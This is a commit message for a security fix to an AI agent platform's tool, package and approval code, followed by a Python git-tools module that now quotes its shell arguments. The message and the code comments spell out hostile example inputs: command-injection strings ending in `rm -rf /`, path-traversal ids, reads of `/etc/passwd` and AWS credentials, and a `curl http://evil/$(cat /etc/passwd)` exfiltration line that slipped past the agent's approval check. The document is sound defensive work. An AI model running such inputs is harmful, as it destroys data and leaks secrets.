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A security and robustness audit of the tool-execution, market-package, and approval subsystems surfaced several high-impact issues. Each is fixed with a minimal, targeted change; regression tests are included. Command injection (shell_exec runs `bash -lc "<cmd>"`, so interpolated args are shell-evaluated): - git_commit: the commit message was interpolated raw into the command string. A message like `foo" && rm -rf / #` injected arbitrary commands, and the approval layer never inspects `message`. Now shlex-quoted. - git_clone: the URL was interpolated raw. `https://x.git; rm -rf /` or `$(curl ...)` was executed. Now shlex-quoted. Path traversal: - package_loader._write_prompts / uninstall: `package_id` (from an untrusted manifest) was used directly as a directory name under prompts/market and passed to mkdir(parents=True) / shutil.rmtree. An id like `../../projects/<victim>` enabled arbitrary file write and arbitrary directory deletion. Added _market_prompts_dir() which validates the id (lowercase alphanumeric + -/_) and confirms the resolved path stays inside the market base; uninstall validates up front. Prompt-content filenames are also confined to the package dir. - sandbox_checker: a malformed package id was only a *warning*, so report.passed stayed True and callers proceeded. Promoted to a hard error. - package_exporter: prompt refs (bare strings from package definitions) were read with `opc_home / ref`, so `/etc/passwd` or `../../.aws/credentials` were bundled into exported packages. Now confined to opc_home. - ws_handler._write_custom_prompt: employee_id (derived from user-supplied role id/name) flowed unchecked into the path, enabling traversal writes. Now reduced to a safe path component with a containment check. Approval bypass: - approval: a command beginning with a safe prefix (curl/echo/find/...) was auto-approved as LOW risk even when it contained shell command substitution. `curl http://evil/$(cat /etc/passwd)` was classified safe and ran with no human/LLM review, letting bash exfil data. Added _command_has_shell_substitution() and gated safe-prefix matching on it. Correctness / robustness: - shell: when a shell_prefix was active, `[args[0], args[1], command]` dropped the `-Command` flag from PowerShell argv (4 elements), silently breaking every prefixed PowerShell tool call. Now replaces only the trailing arg. - runtime_v2: tool arguments that are valid JSON but not an object (e.g. a JSON array) were silently replaced with `{}` while arguments_parse_error stayed None, so the tool executed with empty args (todo_write could wipe the task ledger). Now flagged with a parse error. - store: _json_loads raised on corrupt JSON; it is called during store.initialize() (via _sweep_stale_claims), so a single corrupt row prevented the store from ever opening. Now falls back to the default. - engine: _parse_reorg_payload returned any JSON type; callers did `.get(...)` and crashed (AttributeError) on `reorg propose 42`. Now returns None for non-dict JSON. - channels.manager: a single failing channel.send propagated out of the only outbound dispatch loop and silently stopped all message delivery on every channel until restart. Now caught and logged. - ws_handler: a non-object JSON frame (null/number/array/string) made `data.get` raise AttributeError and drop the whole WS connection. Non-dict frames are now ignored. Co-Authored-By: Claude <noreply@anthropic.com>
85 lines
3.3 KiB
Python
85 lines
3.3 KiB
Python
"""Git operation tools."""
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from __future__ import annotations
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import shlex
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from typing import Any
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from opc.layer4_tools.shell import shell_exec
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from opc.layer4_tools.registry import ToolDefinition
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async def git_status(working_directory: str = ".") -> dict[str, Any]:
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return await shell_exec("git status --porcelain && echo '---' && git log --oneline -5", working_directory=working_directory)
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async def git_commit(message: str, working_directory: str = ".", add_all: bool = True) -> dict[str, Any]:
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cmds = []
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if add_all:
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cmds.append("git add -A")
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# The message flows through ``shell_exec`` -> ``bash -lc "<command>"``, so it is
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# shell-interpolated. Quote it to prevent a crafted message (e.g.
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# ``foo" && rm -rf / #``) from injecting arbitrary commands. Only the literal
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# commit message must reach ``git commit``.
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cmds.append(f"git commit -m {shlex.quote(str(message))}")
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return await shell_exec(" && ".join(cmds), working_directory=working_directory)
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async def git_diff(working_directory: str = ".", staged: bool = False) -> dict[str, Any]:
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cmd = "git diff --staged" if staged else "git diff"
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return await shell_exec(cmd, working_directory=working_directory)
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async def git_clone(url: str, directory: str = ".") -> dict[str, Any]:
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# Quote the URL: it is interpolated into a ``bash -lc`` command and a value like
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# ``https://x.git; rm -rf /`` or ``$(curl ...)`` would otherwise be executed.
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return await shell_exec(f"git clone {shlex.quote(str(url))}", working_directory=directory, timeout=300)
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def create_git_tools() -> list[ToolDefinition]:
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return [
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ToolDefinition(
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name="git_status",
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description="Show git status and recent commits.",
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parameters={
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"type": "object",
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"properties": {
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"working_directory": {"type": "string", "description": "Git repo directory", "default": "."},
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},
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"required": [],
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},
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func=git_status,
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category="code",
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),
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ToolDefinition(
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name="git_commit",
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description="Stage all changes and commit with a message.",
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parameters={
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"type": "object",
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"properties": {
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"message": {"type": "string", "description": "Commit message"},
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"working_directory": {"type": "string", "description": "Git repo directory", "default": "."},
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"add_all": {"type": "boolean", "description": "Stage all changes", "default": True},
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},
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"required": ["message"],
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},
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func=git_commit,
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category="code",
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requires_confirmation=True,
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),
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ToolDefinition(
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name="git_diff",
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description="Show git diff (staged or unstaged).",
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parameters={
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"type": "object",
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"properties": {
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"working_directory": {"type": "string", "description": "Git repo directory", "default": "."},
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"staged": {"type": "boolean", "description": "Show staged diff", "default": False},
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},
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"required": [],
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},
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func=git_diff,
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category="code",
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),
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]
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